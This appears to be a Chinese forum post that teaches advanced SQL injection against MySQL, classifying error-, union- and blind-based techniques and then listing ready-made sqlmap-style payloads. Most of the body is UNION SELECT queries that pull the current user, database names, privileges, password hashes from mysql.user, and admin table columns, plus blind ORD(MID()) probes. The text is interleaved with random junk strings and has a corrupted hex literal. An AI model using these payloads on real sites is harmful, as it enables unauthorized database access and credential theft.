放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。
! k! u" `4 O: j: s7 y, c3 r
$ n& S4 u; v! V* E这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表
& {( K- i3 k8 x! ~$ B9 H* B
( L+ g$ \% `; L! m |6 t9 s分类标准 分类 备注
g2 I* f4 t4 Q" u按字段类型 整型注入,字符型注入 5 p6 R3 w1 j# b
按出现的位置 get注入,post注入,cookie注入,http header注入 % [) D' _+ u. N/ q( N, S0 A! o
然而高级注入是这样的3 h2 c; [; \1 y8 x0 X
- {, M2 Q9 \* ]: T7 l( Q
高级注入分类 条件) h/ t+ k0 s+ W/ J1 Y) W- z
error-based sql 数据库的错误回显可以返回,存在数据库,表结构& f# V4 \% k& H- F/ |
union-based sql 能够使用union,存在数据库,表结构
: C% J* i# s8 p% z/ o9 L7 R; X/ B9 Mblind sql 存在注入$ ^5 a2 a% ^8 Q6 c) R
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
5 q5 t8 ?4 w1 d
5 x; `& Z$ [( K. k \' _好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火9 W' U/ @3 N- X! M; Y
B3 {8 |3 i* h. X9 | j
附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。2 N0 q: x9 f+ O- A2 q+ [) Z) o3 y. O
+ |# E- E9 v/ h3 t" Z' J1 {5 o4 L' d这里用mysql说明3 ^& Y/ F8 n$ Y
2 D% l" t3 C+ r4 Q6 p" J
e注入坛子里很多了,请看戳我或者再戳我1 \4 F1 {" y& f: o
' E% _; Z/ k+ u, u& zu注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
1 l1 a# c6 [1 ?3 y$ n, W
" m, j$ N2 u; p) r3 u# P+ S获取当前数据库用户名% @* i% {) f# [0 _$ o
- L) Q3 {. q+ S0 S% v2 ?: wUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
1 M' I$ W# h& H. Z! d+ t; O7 BAST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
% K; w0 ~. j, a2 ]) C$ @L, NULL#4 K/ A ]8 U8 b- w* ]
注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。# i! S+ r% M9 y" H. }
2 c5 a8 K& @2 k5 R
获取数据库名
! @' ?& ~+ J2 a * I! \0 L* r! P( A1 c) Z
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
0 P) g" Y; K1 ^, T. z/ j3 u' \获取所有用户名
/ B8 P9 m" \6 I/ M. M' v
9 D6 p# V: J! x1 c+ v% ?UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#& _# _) C. L1 ~+ M* t
查看当前用户权限/ g# J! b2 `/ q
; H5 }1 j0 H" f8 y% lUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
: w% V; k& w: z) q. ~8 {尝试获取密码,当然需要有能读mysql数据库的权限0 P! S8 G' c: N" l
) O( v/ X( g. [9 U3 M9 Y
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#+ }3 s1 L. s4 x
获取表名,limit什么的自己搞啦
) n4 S Q3 X4 q) x+ U x4 ? " H7 E% ]) V5 E4 `3 w
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
+ l+ N# j5 a/ v4 `获取字段名及其类型3 a" u0 \! M6 U
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
7 p {+ y f( f- }- a& e
& \6 s5 k2 ]( o5 @1 @5 m2 v' W2 pb注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。! ^4 F: ~# |( P) k: r
( k* r" O; {3 |5 I4 \: e" g4 ]如:8 ]/ o5 I( c# `
获取当前用户名5 Q4 _# P) L8 N* G" B
. Y/ z/ ]. P# p$ p; JAND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
6 R: W$ x) N1 H获取当前数据库7 f8 f: W a& Z& f) @9 G7 ]+ {
9 a" l2 |! i- q5 `- U
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106' A8 L5 g- H+ {6 ~& }3 {3 h
获取表名
( V( s7 Q" U0 c2 a$ E R9 K ( q8 U( U p0 x7 l& P: [" [
AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51
$ {( e, E+ }! x% N获取字段名及其类型和爆内容就不说了,改改上面的就可以了。- R- m% K% m6 d/ r' R6 [7 v
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
- ?& D, D# ], T2 ^爆表
" T4 p; V2 J" F0 E
" b9 ]% s# t8 T* M; oAND EXISTS(select * from table)
: A! a$ W2 s1 j5 Z爆字段
0 P& i _5 [, M2 f . b/ [' R$ V8 G7 {. t
AND EXISTS(select pwd from table)
3 p0 y& o T: k/ C* w3 ]' E盲注的变化就比较多了,由于篇幅,只是举个例子而已。
7 ]+ c+ F7 A# I* Q( y
) F% y0 c. q7 L8 s7 w+ Z本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。 w; ], W+ A; Q& D
|